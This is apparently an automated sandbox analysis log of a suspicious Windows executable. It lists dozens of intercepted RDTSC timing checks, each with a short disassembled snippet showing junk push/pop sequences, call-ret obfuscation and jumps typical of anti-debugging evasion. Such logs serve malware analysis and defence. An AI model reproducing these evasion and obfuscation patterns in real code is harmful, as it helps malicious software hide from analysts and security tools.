Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D390F7 second address: D39103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0D34B708F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D39103 second address: D39108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D40FE3 second address: D40FF1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F0D34B708F6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3F850 second address: D3F85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D41151 second address: D41156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D41303 second address: D41307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D41307 second address: D4130D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D44F52 second address: D44F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007F0D344F4AC0h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4449F second address: D444AA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D444AA second address: D444B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D44784 second address: D44788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D44DD1 second address: D44DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D44DD5 second address: D44DF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70903h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F0D34B708FCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D47AFF second address: D47B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pushad 0x00000007 jns 00007F0D344F4AC2h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D47B1C second address: D47B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D47DAF second address: D47DB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D47DB4 second address: D47DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0D34B708F6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007F0D34B708FCh 0x00000016 jns 00007F0D34B708F6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D47FD6 second address: D47FF9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0D344F4AC3h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D47FF9 second address: D47FFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D47FFD second address: D48003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D487CF second address: D487F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70909h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D487F2 second address: D487F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D487F6 second address: D487FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48A6A second address: D48A74 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48C03 second address: D48C2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0D34B708FCh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F0D34B708FAh 0x00000015 ja 00007F0D34B708F6h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48C2B second address: D48C31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48C31 second address: D48C35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48C35 second address: D48C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F0D344F4AB8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 jg 00007F0D344F4ABCh 0x00000029 sub esi, dword ptr [ebp+122D36CDh] 0x0000002f xchg eax, ebx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F0D344F4AC1h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48C86 second address: D48CBD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0D34B7090Eh 0x00000008 jmp 00007F0D34B70908h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 jmp 00007F0D34B708FBh 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48CBD second address: D48CC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D49229 second address: D4922D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4922D second address: D49231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D49231 second address: D49289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 call 00007F0D34B708FCh 0x0000000e call 00007F0D34B708FBh 0x00000013 jmp 00007F0D34B708FCh 0x00000018 pop edi 0x00000019 pop esi 0x0000001a push ebx 0x0000001b push ebx 0x0000001c mov di, ax 0x0000001f pop edi 0x00000020 pop esi 0x00000021 push 00000000h 0x00000023 push eax 0x00000024 pop esi 0x00000025 push 00000000h 0x00000027 jmp 00007F0D34B70908h 0x0000002c xchg eax, ebx 0x0000002d pushad 0x0000002e push ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D49289 second address: D49292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D49292 second address: D49296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D49BFD second address: D49C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0D344F4ABAh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D49AA5 second address: D49AB9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jne 00007F0D34B708F6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D49C0F second address: D49C72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 ja 00007F0D344F4AB6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F0D344F4AB8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F0D344F4AB8h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 0000001Ah 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 mov esi, dword ptr [ebp+122D30A0h] 0x0000004d xchg eax, ebx 0x0000004e push ebx 0x0000004f push eax 0x00000050 push edx 0x00000051 push ebx 0x00000052 pop ebx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D49C72 second address: D49C83 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4B5E9 second address: D4B635 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F0D344F4AB8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov dword ptr [ebp+122D1800h], edx 0x0000002c push 00000000h 0x0000002e jmp 00007F0D344F4ABFh 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push ebx 0x00000037 push edi 0x00000038 pop edi 0x00000039 pop ebx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4BEEB second address: D4BEEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4BEEF second address: D4BEFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4ABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4BEFE second address: D4BF16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F0D34B708F6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007F0D34B708F6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4BF16 second address: D4BF1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4BF1A second address: D4BF2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0D34B708FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4BF2F second address: D4BF74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F0D344F4AB8h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 mov dword ptr [ebp+122D1969h], ecx 0x00000027 push 00000000h 0x00000029 mov esi, dword ptr [ebp+122D39CDh] 0x0000002f push 00000000h 0x00000031 push edx 0x00000032 xor dword ptr [ebp+122D23FEh], edx 0x00000038 pop edi 0x00000039 xchg eax, ebx 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4BF74 second address: D4BF78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4BF78 second address: D4BF85 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4C7C5 second address: D4C7CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D51CC1 second address: D51D56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D344F4AC8h 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F0D344F4AC5h 0x00000010 nop 0x00000011 mov dword ptr [ebp+12458732h], ebx 0x00000017 push 00000000h 0x00000019 call 00007F0D344F4AC9h 0x0000001e mov dword ptr [ebp+12444A28h], edx 0x00000024 pop edi 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebp 0x0000002a call 00007F0D344F4AB8h 0x0000002f pop ebp 0x00000030 mov dword ptr [esp+04h], ebp 0x00000034 add dword ptr [esp+04h], 00000014h 0x0000003c inc ebp 0x0000003d push ebp 0x0000003e ret 0x0000003f pop ebp 0x00000040 ret 0x00000041 mov edi, esi 0x00000043 xchg eax, esi 0x00000044 pushad 0x00000045 push esi 0x00000046 pushad 0x00000047 popad 0x00000048 pop esi 0x00000049 push eax 0x0000004a jnp 00007F0D344F4AB6h 0x00000050 pop eax 0x00000051 popad 0x00000052 push eax 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jc 00007F0D344F4AB6h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D51D56 second address: D51D5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D52B71 second address: D52B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D51EA4 second address: D51EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D51EB0 second address: D51EB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D51EB4 second address: D51EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D51EBD second address: D51F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 nop 0x00000007 push dword ptr fs:[00000000h] 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F0D344F4AB8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 sub bh, FFFFFFB5h 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 mov bl, 22h 0x00000034 mov eax, dword ptr [ebp+122D0701h] 0x0000003a push 00000000h 0x0000003c push edx 0x0000003d call 00007F0D344F4AB8h 0x00000042 pop edx 0x00000043 mov dword ptr [esp+04h], edx 0x00000047 add dword ptr [esp+04h], 0000001Ah 0x0000004f inc edx 0x00000050 push edx 0x00000051 ret 0x00000052 pop edx 0x00000053 ret 0x00000054 push FFFFFFFFh 0x00000056 mov dword ptr [ebp+122D243Eh], ecx 0x0000005c nop 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 pushad 0x00000061 popad 0x00000062 jnl 00007F0D344F4AB6h 0x00000068 popad 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D53AA6 second address: D53AB0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D53AB0 second address: D53AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D52D9C second address: D52DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D52DA1 second address: D52DB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D344F4ABCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D52DB1 second address: D52DDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jng 00007F0D34B708F6h 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0D34B70907h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54AAC second address: D54B01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F0D344F4ABCh 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 mov edi, dword ptr [ebp+122D39CDh] 0x00000016 push 00000000h 0x00000018 ja 00007F0D344F4ABBh 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007F0D344F4AB8h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 00000016h 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a mov dword ptr [ebp+122D368Fh], edi 0x00000040 push eax 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54B01 second address: D54B05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D53CC6 second address: D53CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D55B61 second address: D55B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D55B6C second address: D55BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 nop 0x00000007 sub dword ptr [ebp+1246F218h], edi 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F0D344F4AB8h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D1D12h], ecx 0x0000002f push 00000000h 0x00000031 add ebx, 1E48A7B8h 0x00000037 mov edi, ebx 0x00000039 xchg eax, esi 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D55BB0 second address: D55BC4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D55BC4 second address: D55BC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D55BC9 second address: D55BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54C6D second address: D54C77 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54C77 second address: D54C7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54C7D second address: D54C97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4ABEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54C97 second address: D54C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54C9B second address: D54CA5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54CA5 second address: D54CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D56AEF second address: D56BAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4ABEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007F0D344F4AC7h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F0D344F4AB8h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e xor edi, 140AC914h 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebx 0x00000039 call 00007F0D344F4AB8h 0x0000003e pop ebx 0x0000003f mov dword ptr [esp+04h], ebx 0x00000043 add dword ptr [esp+04h], 0000001Bh 0x0000004b inc ebx 0x0000004c push ebx 0x0000004d ret 0x0000004e pop ebx 0x0000004f ret 0x00000050 add bx, 14BDh 0x00000055 or ebx, 7B5B9E01h 0x0000005b and edi, dword ptr [ebp+122D36BDh] 0x00000061 xchg eax, esi 0x00000062 jbe 00007F0D344F4ACAh 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007F0D344F4AC4h 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D55DAC second address: D55DDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70904h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0D34B70908h 0x00000010 rdtsc
